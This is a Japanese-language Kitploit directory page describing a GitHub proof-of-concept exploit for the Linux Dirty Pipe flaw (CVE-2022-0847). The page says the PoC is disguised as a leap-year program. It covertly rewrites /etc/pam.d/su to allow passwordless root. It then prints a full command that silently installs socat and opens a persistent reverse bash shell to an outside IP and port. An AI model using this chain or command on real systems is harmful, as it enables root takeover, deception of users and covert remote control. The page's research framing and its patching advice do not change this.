Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-0847-Exploit-Implementation — CVE-2022-0847「Dirty Pipe Exploit」を使用して、外部マシン上で任意のコード実行のためのリバースbashシェルを生成する。 | Kitploit
ツール/GitHubGitHub/joeymeech/cve-2022-0847-exploit-implementation
特権昇格脆弱性分析エクスプロイトペネトレーションテストペイロード開発バイナリエクスプロイト
GitHubjoeymeech/cve-2022-0847-exploit-implementation

CVE-2022-0847-Exploit-Implementation

CVE-2022-0847「Dirty Pipe Exploit」を使用して、外部マシン上で任意のコード実行のためのリバースbashシェルを生成する。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
113年前未レビュー

CVE-2022-0847 エクスプロイト実装

これは、CVE-2022-0847「Dirty Pipe Exploit」を使用して、外部マシン上で任意のコード実行を行うためのリバースBashシェルを起動する方法を示すPOCです。 この脆弱性はLinuxカーネルバージョン5.8以降にのみ影響しますが、バージョン5.16.11、5.15.25、5.10.102以降で修正されました。カーネルを更新してください :)

このエクスプロイトはセキュリティ研究者のMax Kellermann氏によって発見されました。彼の解説が私よりもはるかに優れているため、このエクスプロイトの詳細についてはここでは触れません。解説はこちら; https://dirtypipe.cm4all.com/

このProof of Conceptは一見、指定された年がうるう年かどうかを教えてくれる単純なうるう年プログラムです。 バックグラウンドで、/etc/pam.d/s の行を変更します。 auth sufficient pam_rootok.so という行を auth sufficient pam_permit.so に変更します。この変更により、パスワードを入力せずにスーパーユーザーとしてコマンドを実行できるようになります。 その後、Cの system() 関数を使ってsuとしてコマンドを実行できます。

私は次のコマンドを実行します:

root@kitploit:~
su -c \"apt-get -y install socat\" > /dev/null; socat TCP4:172.23.46.133:4444 EXEC:/bin/bash & exit

この行はシステムにsocatをインストールし、出力をnullファイルにリダイレクトして、ユーザーがダウンロードの出力を見えないようにします。次に、指定されたIPとポートで外部マシンに接続するsocatコマンドを実行します。 & はこのプロセスをバックグラウンドに置き、ユーザーがターミナルを閉じた後も接続が維持されるようにします。

脆弱なマシンでプログラムを実行:
脆弱なマシンの画像

脆弱なマシンへの接続:
外部マシンの画像

ツールをダウンロード